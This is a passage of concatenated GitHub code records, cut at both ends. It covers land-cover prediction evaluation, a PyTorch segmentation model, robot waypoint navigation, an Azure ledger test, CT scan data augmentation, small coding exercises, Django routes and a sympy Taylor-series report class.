np.std(abs(each_difference), axis = 1)\n\n\nmean_diff = np.mean(mean_each_diff)\n\n\n# KULLBACK LEIBLER DIVERGENCE # # # # # # \n\nKL_each_div = np.array([sum(rel_entr(differences_frame['Truth'].values.tolist(), differences_frame.iloc[:,i].values.tolist())) for i in range(10)]).T\n\nKL_overall = sum(rel_entr(comparison_df['Truth'].values.tolist(), comparison_df['Predictions'].values.tolist()))\n \n\n#%%\n\ndisplay, (ax1, ax2, ax3) = plt.subplots(ncols = 3, figsize = (16, 6))\nsns.set_theme(style=\"whitegrid\")\n\n# FIGURE 1 - comparison\nfig1 = sns.barplot(data = resh_comp,\n x = 'Land Cover',\n y = 'Value',\n hue = 'Category',\n alpha = 0.9,\n palette = 'deep',\n edgecolor = 'black',\n ax = ax1) \n\n\nax1.set_xticklabels(labels = fig1.get_xticklabels(), rotation = 30)\nax1.set_yticklabels(labels = [np.arange(0, 45, 5).astype('str')[i] + '%' for i in range(9)])\n\n\n# FIGURE 2 - abs diff\nfig2 = sns.barplot(data = comparison_df,\n x = 'Land Cover',\n y = 'Difference',\n alpha = 0.9,\n color = 'darkred',\n dodge = False,\n edgecolor = 'black',\n ax = ax2)\nax2.set_xticklabels(labels = fig2.get_xticklabels(), rotation = 30)\nax2.set_yticklabels(labels = [np.arange(-20, 30, 5).astype('str')[i] + '%' for i in range(9)])\n\n\n# FIGURE 3 - rel diff\nfig3 = sns.barplot(data = comparison_df,\n x = 'Land Cover',\n y = 'Relative Difference',\n alpha = 0.9,\n color = 'darkred',\n dodge = False,\n edgecolor = 'black',\n ax = ax3)\nax3.set_xticklabels(labels = fig3.get_xticklabels(), rotation = 30)\n","repo_name":"FedericoPavesi/Lucas_points_for_Sentinel2_LandCover_Download","sub_path":"5. map_predictions_evaluation/Stability_final_evaluation.py","file_name":"Stability_final_evaluation.py","file_ext":"py","file_size_in_byte":5647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1024051395","text":"import torch.nn as nn\nimport segmentation_models_pytorch as smp\n\nfrom . import daformer\n\n\nclass UNetDAFormerModel(nn.Module):\n\n def __init__(self, encoder_class, encoder_args, decoder_args, head_args):\n\n super(UNetDAFormerModel, self).__init__()\n\n self.encoder = getattr(smp, encoder_class)(**encoder_args).encoder\n self.decoder = daformer.DAFormerDecoder(**decoder_args)\n self.conv_head = nn.Sequential(\n nn.Conv2d(\n in_channels=self.decoder.decoder_dim,\n out_channels=head_args['classes'],\n kernel_size=1\n ),\n nn.Upsample(\n size=head_args['upsample_size'],\n mode=head_args['upsample_mode'],\n align_corners=head_args['upsample_align_corners']\n ),\n )\n\n def forward(self, x):\n\n x = self.encoder(x)\n x, _ = self.decoder(x[1:])\n out = self.conv_head(x)\n\n return out\n","repo_name":"gunesevitan/hubmap-hpa-hacking-the-human-body","sub_path":"src/torch_modules/unet_daformer.py","file_name":"unet_daformer.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"43212491462","text":"#!/usr/bin/env python3.8\n# -*- coding: utf-8 -*-\n\nimport edubot2\nfrom gs_lps import *\nimport sys\nimport math\nimport time\nimport threading\nimport logging\n\n\nclass WaypointsRobot:\n def __init__(self):\n self.edubot = edubot2.EduBot(enableDisplay=False)\n self.edubot.Start()\n logging.basicConfig(level=logging.CRITICAL)\n self._time_start = time.time()\n self._battery_watch_timer = time.time()\n self._nav = us_nav()\n self._nav.start()\n\n self._telemetery_update_timeout = 0.005\n self._telemetery_update_time = time.time() - self._telemetery_update_timeout\n self._telemetery_alive_timeout = 1\n self._telemetery_get_time = time.time() - self._telemetery_alive_timeout\n\n self._telemetery_thread = threading.Thread(target=self._update_coordinates)\n self._telemetery_thread.start()\n\n self.filters = [MedianFilter(), MedianFilter(), MedianFilter()]\n\n self.x = 0\n self.y = 0\n self.yaw = 0\n\n def go_to_local_point(self, x_target, y_target, driving): # доехать до точки с заданными координатами\n if _check_dist_in_circle((self.x, self.y), (x_target, y_target), 0.3):\n self.edubot.Beep()\n logging.info(\"Point is reached\")\n return True\n\n result_1 = self._rotate_to_target(x_target, y_target, driving)\n result_2 = self._straight_to_target(x_target, y_target, driving)\n\n if result_2 and result_1:\n self.edubot.Beep()\n logging.info(\"Point is reached\")\n return True\n return False\n\n def go_to_local_point_body_fixed(self, dx, dy,\n driving): # доехать до точки с заданным смещением относительно текущей позиции\n x, y, yaw = self.x, self.y, self.yaw\n return self.go_to_local_point(x + dx, y + dy, driving)\n\n def _rotate_to_target(self, x_target, y_target, is_driving, kp=20, ki=0, kd=0, angle_accuracy=0.2): # повернуться в сторону заданной точки\n e_prev = 0\n e_sum = 0\n x, y, yaw = self.x, self.y, self.yaw\n angle = _normalize_angle(math.atan2(y_target - y, x_target - x) - yaw)\n while abs(angle) > angle_accuracy:\n if not is_driving.is_set():\n self.stop()\n return False\n self._check_battery()\n x, y, yaw = self.x, self.y, self.yaw\n angle = _normalize_angle(math.atan2(y_target - y, x_target - x) - yaw)\n e_sum += angle\n e_sum = _saturate(e_sum, 10)\n u_s = 0\n u_r = _saturate(kp * angle + e_sum * ki + kd * (angle - e_prev), 50)\n self._set_speed(u_s + u_r, u_s - u_r)\n logging.debug(x, y, yaw, u_s, u_r)\n e_prev = angle\n self.stop()\n return True\n\n def _straight_to_target(self, x_target, y_target, is_driving, kp=32, ki=0, kd=0, dist_accuracy=0.2, speed_max = 80,\n dist_speedup=0.05, dist_slowdown=0.3): # движение в точку с динамической коррекцией угла\n e_prev = 0\n e_sum = 0\n x, y, yaw = self.x, self.y, self.yaw\n x_start, y_start = x, y\n dist = math.dist((x, y), (x_target, y_target))\n while dist > dist_accuracy:\n if not is_driving.is_set():\n self.stop()\n return False\n self._check_battery()\n\n x, y, yaw = self.x, self.y, self.yaw\n dist = math.dist((x, y), (x_target, y_target))\n dist_start = dist = math.dist((x, y), (x_start, y_start))\n angle = _normalize_angle(math.atan2(y_target - y, x_target - x) - yaw)\n\n if dist_start < dist_speedup:\n u_s = speed_max * (dist_start / dist_speedup) # разгон на старте\n elif dist < dist_slowdown:\n u_s = speed_max * (dist / dist_slowdown) * 2 # замедление на финише\n else:\n u_s = speed_max # движение с максимально возможной линейной скоростью + коррекция угла\n\n e_sum += angle\n e_sum = _saturate(e_sum, 10)\n u_r = (kp * angle + kd * (angle - e_prev) + e_sum * ki) * _saturate(min(dist, dist_start) * 10, 1)\n self._set_speed(u_s + u_r, u_s - u_r)\n\n logging.debug(x, y, yaw, u_s, u_r)\n e_prev = angle\n time.sleep(0.025)\n self.stop()\n return True\n\n def _check_battery(self):\n if time.time() - self._battery_watch_timer >= 5: # проверка заряда каждые 5 секунд\n voltage = self.edubot.GetPowerData()[0]\n self.battery_watch_timer = time.time()\n if voltage <= 6.6:\n print(\"low battery\")\n self.stop()\n self.edubot.Beep()\n self.exit_program()\n\n def _set_speed(self, left, right):\n left, right = _saturate(left, 100), _saturate(right, 100)\n self.edubot.rightMotor.SetParrot(round(right))\n self.edubot.leftMotor.SetParrot(round(-left))\n\n def servo(self, pwm):\n pass\n\n def _update_coordinates(self): # получение координат и угла рыскания с локуса\n while True:\n if time.time() - self._telemetery_update_time > self._telemetery_update_timeout:\n if time.time() - self._telemetery_get_time > self._telemetery_alive_timeout:\n print(\"Error getting coords from lokus\")\n self._telemetery_get_time = time.time()\n elif time.time() - self._telemetery_update_time > self._telemetery_alive_timeout:\n print(f'x: {self.x}, y: {self.y}, yaw: {self.yaw}')\n\n pos = self._nav.get_position()\n angles = self._nav.get_angles()\n\n if pos is not None and angles is not None and pos[0] != 0 and pos[1] != 0:\n self._telemetery_update_time = time.time()\n self._telemetery_get_time = time.time()\n x, y = pos[0], pos[1]\n yaw = angles[2] + 3.14 # поворот системы координат\n x, y, yaw = self.filters[0].filter(x), self.filters[1].filter(y), self.filters[2].filter(yaw)\n self.x, self.y, self.yaw = x, y, yaw\n\n def get_local_position(self):\n x, y, yaw = self.x, self.y, self.yaw\n return [x, y, 0]\n\n def get_attitude(self):\n x, y, yaw = self.x, self.y, self.yaw\n return [0, 0, yaw]\n\n def stop(self):\n self._set_speed(0, 0)\n\n def get_battery_status(self):\n voltage, current, power = self.edubot.GetPowerData()\n return [voltage, current, power]\n\n def exit_program(self):\n print(\"exit\")\n self.stop()\n self.edubot.Release()\n\nclass MedianFilter: # медианный фильтр для фильтрации одиночных выбросов\n history = [-10]\n\n def filter(self, x):\n self.history.append(x)\n while len(self.history) > 3:\n self.history.pop(0)\n return sorted(self.history)[1]\n\n\ndef _saturate(value, limit): # ограничение значения отрезком [-limit; limit]\n limit = abs(limit)\n if value < -limit:\n return -limit\n elif value > limit:\n return limit\n else:\n return value\n\n\ndef _normalize_angle(angle):\n while angle < -math.pi:\n angle += 2 * math.pi\n while angle > math.pi:\n angle -= 2 * math.pi\n return angle\n\n\ndef _check_dist_in_circle(p1, p2, dist):\n d = math.dist(p1, p2)\n return True if d < dist else False\n\n\nif __name__ == \"__main__\":\n robot = WaypointsRobot()\n is_driving = threading.Event()\n is_driving.set()\n if sys.argv[1] and sys.argv[2]:\n x_target, y_target = float(sys.argv[1]), float(sys.argv[2])\n robot.go_to_local_point(x_target, y_target, is_driving)\n","repo_name":"GeoScan-Pioneer/edubot_sdk","sub_path":"edubot_waypoints.py","file_name":"edubot_waypoints.py","file_ext":"py","file_size_in_byte":8193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43107506306","text":"import asyncio\nimport time\n\nfrom azure.confidentialledger import (\n ConfidentialLedgerCertificateCredential,\n LedgerUserRole,\n)\nfrom azure.confidentialledger.aio import ConfidentialLedgerClient\n\nfrom _shared.client_test_common_async import AsyncConfidentialLedgerClientTestMixin\n\nAAD_USER_OBJECT_ID = \"a\" * 36\n\n\nclass AsyncAadCredentialClientTest(\n AsyncConfidentialLedgerClientTestMixin.AsyncBaseTest\n):\n def setUp(self):\n super().setUp()\n self.client = self.create_client_from_credential(\n ConfidentialLedgerClient,\n credential=self.get_credential(ConfidentialLedgerClient, is_async=True),\n ledger_certificate_path=self.network_certificate_path,\n endpoint=self.confidential_ledger_url,\n )\n\n client = self.create_client_from_credential(\n ConfidentialLedgerClient,\n credential=ConfidentialLedgerCertificateCredential(\n self.user_certificate_path\n ),\n ledger_certificate_path=self.network_certificate_path,\n endpoint=self.confidential_ledger_url,\n )\n\n aad_object_id = self.set_value_to_scrub(\n \"CONFIDENTIAL_LEDGER_AAD_USER_OBJECT_ID\", AAD_USER_OBJECT_ID\n )\n\n # Since setUp cannot be async\n task = asyncio.ensure_future(\n client.create_or_update_user(aad_object_id, LedgerUserRole.ADMINISTRATOR)\n )\n while not task.done:\n time.sleep(0.5)\n","repo_name":"mirespace/python-azure","sub_path":"sdk/confidentialledger/azure-confidentialledger/tests/test_confidential_ledger_client_aad_async.py","file_name":"test_confidential_ledger_client_aad_async.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"10288397858","text":"import torch\nimport numpy as np\nimport ctfishpy\nfrom ctfishpy.train_utils import Trainer, test_jaw, precacheSubjects, CTSubjectDataset\n\nimport matplotlib.pyplot as plt\nimport neptune.new as neptune\nimport os\nimport random\nimport monai\nimport math\nimport torchio as tio\nfrom neptune.new.types import File\nfrom tqdm import tqdm\nimport gc\nimport torch.nn.functional as F\nfrom pathlib2 import Path\nfrom ray import tune\n\ndef renormalise(array):\n\tarray = np.squeeze(array) # remove batch dim and channel dim -> [H, W]\n\tarray = array * 255\n\treturn array\n\ndef undo_one_hot(result, n_classes, threshold=0.5):\n\tlabel = np.zeros(result.shape[1:], dtype = 'uint8')\n\tfor i in range(n_classes):\n\t\tif len(result.shape) == 4:\n\t\t\tr = result[i, :, :, :,]\n\t\telif len(result.shape) == 3:\n\t\t\tr = result[i, :, :,]\n\t\telse:\n\t\t\traise Warning(f\"result shape unknown {result.shape}\")\n\t\tlabel[r>threshold] = i\n\treturn label\n\nif __name__ == \"__main__\":\n\n\t# dataset_path = '/home/ak18001/Data/HDD/uCT'\n\tdataset_path = '/mnt/scratch/ak18001/uCT'\n\t# dataset_path = '/mnt/storage/home/ak18001/scratch/Colloids'\n\t# dataset_path = '/data/mb16907/wahab/Colloids'\n\t# dataset_path = '/user/home/ak18001/scratch/Colloids/' #bc4\n\t# dataset_path = '/user/home/ak18001/scratch/ak18001/Colloids' #bp1\n\t# dataset_path = \"/home/wahab/Data/HDD/uCT\"\n\n\tctreader = ctfishpy.CTreader(dataset_path)\n\n\tcurated = [257,351,241,164,50,39,116,441,291,193,420,274,364,401,72,71,69,250,182,183,301,108,216,340,139,337,220,1,154,230,131,133,135,96,98,]\n\tdamiano = [131,216,351,39,139,69,133,135,420,441,220,291,401,250,193]\n\tready = [1, 50, 71, 72, 96, 116, 164, 182, 183, 241, 257, 274, 301, 337, 340, 364]+damiano\n\tbone = ctfishpy.JAW\n\tdataset_name = \"JAW_20230124\"\n\n\tkeys = ctreader.get_hdf5_keys(f\"{dataset_path}/LABELS/{bone}/{dataset_name}.h5\")\n\tprint(f\"all keys len {len(keys)} nums {keys}\")\n\n\tremove = [216,257,274] # 216 hi res, 257 bad seg from me, 274 sp7 fucked\n\tready = [x for x in ready if x not in remove]\n\tprint(f\"All data: {len(ready)}, nums {ready}\")\n\n\trandom.seed(42)\n\trandom.shuffle(ready)\n\t# train_data = ready[:25]\n\t# val_data = ready[25:28]\n\t# test_data = ready[25:]\n\ttrain_data = [1]#ready[:1]\n\tval_data = ready[2:3]\n\ttest_data = ready[2:3]\n\tprint(f\"train = {train_data} val = {val_data} test = {test_data}\")\n\n\tnum_workers = 10\n\n\tconfig = {\n\t\t\"lr\": 0.00263078,\n\t\t\"batch_size\": 10,\n\t\t\"n_blocks\":5,\n\t\t\"norm\": 'BATCH',\n\t\t\"epochs\": 100,\n\t\t\"start_filters\": 32,\n\t\t\"kernel_size\": 7,\n\t\t\"activation\": \"RELU\",\n\t\t\"dropout\": 0.2,\n\t\t\"patch_size\": (192,192,192),\n\t\t\"loss_function\": monai.losses.TverskyLoss(include_background=False, alpha=0.2), \n\t\t# \"loss_function\": monai.losses.GeneralizedDiceLoss(include_background=True),\n\t}\n\n\n\tparams = dict(\n\t\tdataset_path=dataset_path,\n\t\tbone=bone,\n\t\tdataset_name=dataset_name,\n\t\troiSize = (224, 224, 224),\n\t\tpatch_size = config['patch_size'], #(100,100,100),\n\t\tsampler_probs = {0:5, 1:5, 2:5, 3:6, 4:6},\n\t\ttrain_data = train_data,\n\t\tval_data = val_data,\n\t\ttest_data = test_data,\n\t\tbatch_size = config['batch_size'],\n\t\tkernel_size = config['kernel_size'],\n\t\tn_blocks = config['n_blocks'],\n\t\tnorm = config['norm'],\n\t\tloss_function = config['loss_function'],\n\t\tlr = config['lr'],\n\t\tepochs = config['epochs'],\n\t\tstart_filters = config['start_filters'],\n\t\tactivation = config['activation'],\n\t\tnum_workers = num_workers,\n\t\tn_classes = 5, #including background\n\t\trandom_seed = 42,\n\t\tdropout = config['dropout'],\n\t\tspatial_dims = 3,\n\t)\n\t\n\ttransforms = tio.Compose([\n\t\ttio.RandomFlip(axes=(0,1,2), flip_probability=0.5),\n\t\ttio.CropOrPad(params['patch_size'], padding_mode=0, p=0.5),\n\t\ttio.RandomAffine(p=0.5),\n\t\ttio.ZNormalization(masking_method='label',p=0.5),\n\t\ttio.OneOf({\n\t\t\ttio.RandomBlur(): 0.1,\n\t\t\ttio.RandomBiasField(0.25, order=4): 0.1,\n\t\t\ttio.RandomNoise(0, 0.02): 0.1,\n\t\t\ttio.RandomGamma((-0.1,0.1)): 0.1,\n\t\t}),\n\t\ttio.OneOf({\n\t\t\ttio.RescaleIntensity(percentiles=(0,99)): 0.1,\n\t\t\ttio.RescaleIntensity(percentiles=(1,100)): 0.1,\n\t\t\ttio.RescaleIntensity(percentiles=(0.5,99.5)): 0.1,\n\t\t})\n\t])\n\t#TODO find a way to precalculate this for tiling\n\t# if config['n_blocks'] == 2: label_size = (48,48,48)\n\t# if config['n_blocks'] == 3: label_size = (24,24,24)\n\tlabel_size = params['roiSize']\n\n\ttrain_subjects = precacheSubjects(params['dataset_path'], params['train_data'], params['bone'], params['roiSize'], dataset_name=params['dataset_name'])\n\ttrain_ds = tio.SubjectsDataset(train_subjects, transform=transforms) \n\tpatch_sampler = tio.LabelSampler(params['patch_size'], 'label', params['sampler_probs'])\n\tpatches_queue = tio.Queue(\n\t\ttrain_ds,\n\t\tmax_length=8000,\n\t\tsamples_per_volume=1,\n\t\tsampler=patch_sampler,\n\t\tnum_workers=params['num_workers'],\n\t)\n\ttrain_loader = torch.utils.data.DataLoader(patches_queue, batch_size=params['batch_size'], shuffle=False, num_workers=0, pin_memory=torch.cuda.is_available())\n\n\ti = train_data[0]\n\tscan = ctreader.read(i)\n\tlabel = ctreader.read_label(bone, i, name=\"JAW_20230124\")\n\tcenter = ctreader.jaw_centers[i]\n\tx = ctreader.crop3d(scan, params['roiSize'], center=center)\n\tx = np.array((x/x.max())*255, dtype=\"uint8\")\n\ty = ctreader.crop3d(label, params['roiSize'], center=center)\n\tprint(x.shape, x.min(), x.max(), x.dtype)\n\tprint(y.shape, y.min(), y.max(), y.dtype)\n\n\t# import pdb; pdb.set_trace()\n\tproj = ctreader.plot_side_by_side(x, y)\n\tprint(proj.shape, proj.min(), proj.max(), proj.dtype)\n\tplt.imsave(f\"output/figs/jaw/data_aug/data_aug_raw.png\", proj)\n\n\t# import pdb;pdb.set_trace()\n\tsaved = 0\n\ttarget = 10\n\tfor e in range(target):\n\t\tfor batch in train_loader:\n\t\t\tprint(batch.keys())\n\t\t\txs,ys = batch['ct'][tio.DATA].cpu(), batch['label'][tio.DATA].cpu()\n\n\t\t\tfor x,y in zip(xs, ys):\n\t\t\t\tprint(x.shape, y.shape)\n\n\t\t\t\tx = np.squeeze(np.array(x))*255\n\t\t\t\ty = undo_one_hot(np.array(y), n_classes=5)\n\n\t\t\t\tprint(x.max(), x.min())\n\n\t\t\t\tproj = ctreader.plot_side_by_side(x, y)\n\t\t\t\tproj = proj/proj.max()\n\t\t\t\tplt.imsave(f\"output/figs/jaw/data_aug/data_aug_{saved}.png\", proj)\n\t\t\t\tsaved+=1\n\t\t\t\tif saved >= target: exit()\n\t\t\t\t# break\n\t\t\t\t# ctreader.view(x, label=y)\n\n\n\n\n\n","repo_name":"wahabk/ctfishpy","sub_path":"scripts/jaw/training/test_datagenie.py","file_name":"test_datagenie.py","file_ext":"py","file_size_in_byte":5994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"69804164249","text":"def trailingZeroes(n: int) -> int:\n res = 0\n for i in range(5, n + 1, 5):\n while i % 5 == 0:\n res += 1\n i //= 5\n\n return res\n\n\nif __name__ == '__main__':\n print(trailingZeroes(30))\n","repo_name":"DengBoCong/Algorithm","sub_path":"core/FactorialTrailingZeroes/FactorialTrailingZeroes.py","file_name":"FactorialTrailingZeroes.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"31"} +{"seq_id":"20291475068","text":"import os \nprint(os.name)\n\nimport os\nprint(os.getcwd())\n# To print absolute path on your system\nprint(os.path.abspath('.'))\n\n# To print files and directories in the current directory\n# on your system\nprint(os.listdir('.'))\n\nfd = \"GFG.txt\"\nfile = open(fd, 'w')\ntext = file.write(\" \")\nprint(text)\nfile.close()\n\nfd = \"stud.txt\"\nfile = open(fd, 'r')\ntext = file.read()\nprint(text)\nfile.close()\n\n\n# file rename\nfd = \"GFG.txt\"\n# os.rename(fd,'New.txt')\nos.uname()\nprint(os.uname())\n\n\n","repo_name":"davesarath/python-programs","sub_path":"os and file projects/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17635465818","text":"'''\nDescription: \nversion: \nAuthor: Data Designer\nDate: 2020-11-01 22:30:24\nLastEditors: Data Designer\nLastEditTime: 2021-05-12 19:04:47\n'''\n#\n# @lc app=leetcode.cn id=29 lang=python3\n#\n# [29] 两数相除\n#\n\n# @lc code=start\nclass Solution:\n def divide(self, dividend: int, divisor: int) -> int:\n result = 0\n flag = 0 # sign\n # 先考虑符号\n if abs(dividend) + abs(divisor) == abs(dividend+divisor):\n flag = 1\n else:\n flag = -1\n # 被除数较小\n if abs(dividend)0:\n # ans+=1\n # s -=abs(divisor)\n # return ans*flag\n else:\n # ans = 1 无法传进闭包\n dividend = abs(dividend)\n divisor = abs(divisor)\n def div(dividend,divisor):\n if dividend < divisor: # 务必加上\n return 0\n ans = 1\n cur = divisor\n while cur+cur< dividend:\n cur = cur + cur # 1,2,4倍数\n ans +=ans\n return ans + div(dividend-cur,divisor) # 有一半是divisor的倍数,几倍也记下来了,然后看不足一半的是divsor的什么倍数\n result = div(dividend,divisor)\n if flag<0:\n result = 0-result\n if result>2**31-1:\n return 2**31-1\n elif result<-2**31:\n return -2**31\n else:\n return result\n\n# @lc code=end\n\n","repo_name":"Data-Designer/Leetcode-Travel","sub_path":"leetcode/29.两数相除.py","file_name":"29.两数相除.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"41817578508","text":"from hashlib import md5\n\nif __name__ == \"__main__\":\n key = \"ckczppom\"\n zeros = 6\n\n i = 0\n while True:\n attempt = \"\".join([key, str(i)]).encode('utf-8')\n if md5(attempt).hexdigest()[0:zeros] == \"0\" * zeros:\n print(i)\n break\n i += 1","repo_name":"tcdejong/advent-of-code","sub_path":"2015/day04/day04.py","file_name":"day04.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8591863278","text":"import time\r\n\r\ndef FindDivisors(number):\r\n userInput = number\r\n exactDivisors = list()\r\n for divisors in range(1, userInput + 1):\r\n if userInput % divisors == 0:\r\n exactDivisors.append(divisors)\r\n print(\"Exact divisors of {} = {}\".format(userInput, exactDivisors))\r\n\r\nwhile True:\r\n userChoice = input(\"Give me a number or For quit : 'Q'\")\r\n if userChoice.lower() == \"q\":\r\n break\r\n else:\r\n FindDivisors(int(userChoice))\r\n\r\n#or\r\n\r\ndef TamBolenleriBulma(sayi):\r\n tamBolenler = list()\r\n for sayilar in range(1, sayi):\r\n if sayi % sayilar == 0:\r\n tamBolenler.append(sayilar)\r\n return tamBolenler\r\n\r\nwhile True:\r\n kullaniciSecimi = input(\"Çıkmak için Q: \")\r\n if kullaniciSecimi.lower == \"q\":\r\n break\r\n else:\r\n print(kullaniciSecimi, \"sayisinin tam bolenleri\", TamBolenleriBulma(int(kullaniciSecimi)))","repo_name":"Nihilnia/reset","sub_path":"Day 15 - Exact divisors of a Number Questioning.py","file_name":"Day 15 - Exact divisors of a Number Questioning.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"41721720531","text":"\nfrom django.contrib.staticfiles.storage import staticfiles_storage\nfrom django.views.generic.base import RedirectView\nfrom django.urls import path\nfrom project import views\nfrom django.contrib import admin\n\napp_name = 'project'\n\nurlpatterns = [\n path('favicon.ico', RedirectView.as_view(url=staticfiles_storage.url('img/favicon.ico'))),\n path('admin/', admin.site.urls),\n path('', views.home, name='home'),\n path('accounts/login/', views.login, name='login'),\n path('accounts/register/', views.register, name='register'),\n path('accounts/login/home/', views.user_home, name='userhome'),\n path('news/', views.news, name='news'),\n path('news/', views.userNews, name='usernews'),\n path('myBracket/', views.myBracket, name='bracket'),\n path('createBracket/', views.createBracket, name='createBracket'),\n path('editBracket//', views.editBracket, name='edit'),\n path('scores/', views.scores, name='scores'),\n path('scores/', views.userScores, name='userscores'),\n path('teams/', views.teams, name='teams'),\n path('createTeam/', views.createTeam, name='createTeam'),\n path('joinTeam/', views.joinTeam, name='joinTeam'),\n path('userTeams/', views.userTeams, name='userteams'),\n path('leaveTeam/', views.leaveTeam, name='leaveTeam'),\n path('prediction/', views.prediction, name='prediction'),\n]\n","repo_name":"srh95/CSDS-395-Senior-Project","sub_path":"method/method/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15921231127","text":"from sympy import *\nimport sympy as sym\nimport itertools as itools\nfrom pylatex import (Document, Package, Command\n #Section, Subsection, Subsubsection, Itemize, HorizontalSpace, Description, Marker\n )\nfrom pylatex.base_classes.containers import Container\n#from pylatex.section import Paragraph, Chapter\nfrom pylatex.utils import (#italic, \n NoEscape)\n\nfrom ..adaptable import *\nfrom ..report import *\n\n\nclass MultivariableTaylorSeries(Expr):\n \n def __new__(cls,expr, variables,*args, n=2, x0=None):\n \n obj=super().__new__(cls,expr,variables,*args)\n obj._vars = variables\n obj._order = n\n obj._op_point = x0\n \n obj._expr_symbol = None\n \n return obj\n\n def _set_default_op_point(self):\n '''\n It sets 0 as op_point if x0 (look __new__) is not provided. For lack of op_point, the result is the same as MacLaurina series \n '''\n \n if self._op_point is None:\n self._op_point = {coord:0 for coord in self._vars}\n \n return self._op_point\n \n def _args_shifted(self,*args):\n \n self._set_default_op_point()\n \n args_shifted = {\n arg: arg - arg_shift\n for arg, arg_shift in self._op_point.items()\n }\n \n return args_shifted\n\n def _diff_orders_dict(self):\n \n order_max = self._order\n args = self._vars\n args_shifted = self._args_shifted()\n \n \n diff_orders_list = sum([\n list(itools.combinations_with_replacement(args, order))\n for order in range(1, order_max + 1, 1)\n ], [])\n \n \n diff_orders_dict = {\n comp: (sym.Mul(*comp).subs(args_shifted) / sym.Mul(*[\n sym.factorial(elem) for elem in sym.Poly(sym.Mul(*comp), *args).terms()[0][0]\n ])).doit()\n for comp in diff_orders_list\n }\n\n return diff_orders_dict\n\n \n def _diff_symbols_dict(self):\n \n diff_orders_dict=self._diff_orders_dict()\n expr=self.args[0]\n op_point=self._op_point\n \n \n \n return {S.Zero:Subs(expr,list(op_point.keys()),list(op_point.values())),**{args_tmp:Subs(Derivative(expr,*args_tmp,evaluate=False),list(op_point.keys()),list(op_point.values())) \n for args_tmp, poly in diff_orders_dict.items()}}\n\n def _diff_expr_dict(self):\n \n diff_orders_dict=self._diff_orders_dict()\n expr=self.args[0]\n op_point=self._op_point\n \n return {S.Zero:expr.subs(op_point),**{args_tmp:expr.diff(*args_tmp).subs(op_point)\n for args_tmp, poly in diff_orders_dict.items()}}\n \n def _components_dict(self):\n \n diff_orders_dict=self._diff_orders_dict()\n derivatives_dict=self._diff_symbols_dict()\n \n expr=self.args[0]\n op_point=self._op_point\n \n return {\n Subs(expr,list(op_point.keys()),list(op_point.values())):expr.subs(op_point),\n **{derivatives_dict[args_tmp] : expr.diff(*args_tmp).subs(op_point) for args_tmp, poly in diff_orders_dict.items()}\n }\n \n def _series(self):\n diff_orders_dict=self._diff_orders_dict()\n diff_dict=self._diff_symbols_dict()\n \n expr=self.args[0]\n op_point=self._op_point\n \n return expr.subs(op_point).doit()+Add(*[expr.diff(*args_tmp).subs(op_point).doit() * poly for args_tmp, poly in diff_orders_dict.items()],evaluate=False)\n \n def _symbolic_sum(self):\n diff_orders_dict=self._diff_orders_dict()\n diff_dict=self._diff_symbols_dict()\n \n expr=self.args[0]\n op_point=self._op_point\n \n return Subs(expr,list(op_point.keys()),list(op_point.values()))+Add(*[Mul(diff_dict[args_tmp] ,poly,evaluate=True) for args_tmp, poly in diff_orders_dict.items()],evaluate=False)\n \n def _latex(self,*args):\n \n diff_orders_dict=self._diff_orders_dict()\n diff_dict=self._diff_symbols_dict()\n \n expr=self.args[0]\n op_point=self._op_point\n \n return '+'.join([latex(Mul(diff_dict[args_tmp] ,poly,evaluate=True)) for args_tmp, poly in diff_orders_dict.items()])\n\n \n def calculation_steps(self,expr_symbol=None,form=None):\n\n obj = self\n \n if expr_symbol is None:\n obj._expr_symbol = self.args[0]\n \n obj_sym = self.__class__(expr_symbol,self._vars, n=self._order, x0=self._op_point)\n \n expr_dict=(self._diff_expr_dict())\n diffs_dict=(obj_sym._diff_symbols_dict())\n \n\n \n \n return [Eq(diffs_dict[key],expr_dict[key].doit()) for key in diffs_dict.keys()]\n \n def __str__(self,*args):\n return (self.args[0]).__str__()\n \n def __repr__(self,*args):\n return (self.args[0]).__repr__()\n\n \n \n \n def doit(self,*args):\n return self._series()\n\n\nclass ReportComponent(Subsection):\n\n latex_name = 'subsection'\n packages=[\n Package('standalone'),\n Package('siunitx')\n ]\n \n title='Report generic component'\n\n def __init__(self, system,title=None, numbering=False, *, label=True, **kwargs):\n \"\"\"\n Args\n ----\n title: str\n The section title.\n numbering: bool\n Add a number before the section title.\n label: Label or bool or str\n Can set a label manually or use a boolean to set\n preference between automatic or no label\n \"\"\"\n\n self._system=system\n \n if title is None:\n title = self.title\n \n super().__init__(title=title, numbering=numbering, label=label, **kwargs)\n\n\n \n\n ReportText.set_container(self)\n #ReportText.set_directory('./SDAresults')\n SympyFormula.set_container(self)\n LatexDataFrame.set_default_container(self)\n Markdown.set_container(self)\n LatexDataFrame.set_picture_mode(True)\n Picture.set_container(self)\n #LatexDataFrame.set_directory('./SDAresults')\n \n \n self.append_elements()\n \n def append_elements(self):\n pass\n\n def as_frame(self):\n frame=Frame(title=self.title,options=['allowframebreaks'])\n #frame.packages +(self.packages)\n frame+=(list(self))\n return frame\n\n\n\nclass 